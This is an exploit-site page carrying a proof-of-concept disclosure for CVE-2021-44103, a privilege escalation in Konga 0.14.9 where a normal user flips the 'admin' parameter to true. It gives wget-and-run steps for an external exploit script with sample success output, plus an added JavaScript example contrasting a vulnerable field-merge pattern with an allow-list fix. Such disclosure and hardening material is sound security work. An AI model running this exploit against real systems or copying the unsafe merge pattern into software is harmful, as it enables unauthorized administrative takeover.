## https://sploitus.com/exploit?id=A00E4CA2-764A-5006-9E88-00CDF5E0C3A9
# CVE-2021-44103
A proof of concept for KONGA 0.14.9 - Privilege Escalation.
## Intro
On November 16, 2021, Fabrício Salomão and I found a vulnerability in Konga API Gateways, allowing any authenticated user to become an administrator.
## Report Vulnerability
Product: KONGA<br/>
Model: 0.14.9<br/>
Vulnerability: Privilege Escalation<br/>
Impact: Full admin access (vertical privilege escalation)<br/>
Authentication: required<br/>
Exploit Author: [Fabricio Salomao](https://twitter.com/_SOl0m0n) / [Paulo Trindade](https://twitter.com/paulotrindadec)
## PoC
Below, a normal user called "usernormal" was created without privileges.
![Crash](/images/konga01.png)
![Crash](/images/konga02.png)
In the request below, the flag in the "admin" parameter was changed from "FALSE" to "TRUE".
![Crash](/images/konga03.png)
We therefore created an exploit: https://www.exploit-db.com/exploits/50521
![Crash](/images/konga04.png)
After running the exploit, the privilege escalation was a success!
Result:
![Crash](/images/konga05.jpg)
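
The request above succeeds because the server accepts a client-supplied "admin" value from a user who is not an administrator. The following block is an added example, not Konga's code and not part of the original PoC: it contrasts that merge-everything pattern with a per-role allow-list. All function names, the field names other than `admin`, and the sample users are assumptions.

```javascript
// Added example (not Konga's code): filter a user-update payload on the server
// so a non-admin cannot set privileged fields such as "admin".
// Field names other than "admin" and all function names are assumptions.
const SELF_EDITABLE = new Set(['firstName', 'lastName', 'email', 'password']);
const ADMIN_ONLY = new Set(['admin', 'active']);

// Vulnerable pattern: every client-supplied key is merged into the record.
function updateUserUnsafe(record, body) {
  return Object.assign({}, record, body);
}

// Hardened pattern: authorize the target, then allow-list fields per role.
function updateUserSafe(actor, record, body) {
  const isAdmin = actor.admin === true;
  if (!isAdmin && actor.id !== record.id) {
    return { ok: false, status: 403, reason: 'cannot edit another user' };
  }
  const changes = {};
  const rejected = [];
  for (const [key, value] of Object.entries(body)) {
    if (SELF_EDITABLE.has(key) || (isAdmin && ADMIN_ONLY.has(key))) {
      changes[key] = value;
    } else {
      rejected.push(key); // "admin" from a non-admin, or any unknown key
    }
  }
  if (rejected.length > 0) {
    // Fail closed and report the keys so the attempt can be logged and alerted on.
    return { ok: false, status: 403, reason: 'forbidden fields', rejected };
  }
  return { ok: true, status: 200, user: Object.assign({}, record, changes) };
}

// Constructed sample data.
const normalUser = { id: 10, username: 'usernormal', admin: false };
const adminUser = { id: 1, username: 'admin', admin: true };
const tamperedBody = { email: 'u@example.com', admin: true };

console.log(updateUserUnsafe(normalUser, tamperedBody));           // record now has admin: true
console.log(updateUserSafe(normalUser, normalUser, tamperedBody)); // rejected with 403
console.log(updateUserSafe(adminUser, normalUser, { admin: true })); // allowed for an admin
```

The `rejected` list in the 403 result is the useful detection signal: a non-admin sending `admin` in an update body should never happen in normal use of the UI.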
## Running the exploit
```
wget https://www.exploit-db.com/raw/50521 -O 50521.py
# Edit 50521.py and modify:
urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga" # change user
password = "changeme" # change password
# Execute:
python 50521.py
[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success
```
## LINKS
http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
https://www.exploit-db.com/exploits/50521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103
https://github.com/advisories/GHSA-f2mp-8fgg-7465
https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821
https://twitter.com/CVEnew/status/1508455166885961732
https://twitter.com/search?q=CVE-2021-44103&src=typed_query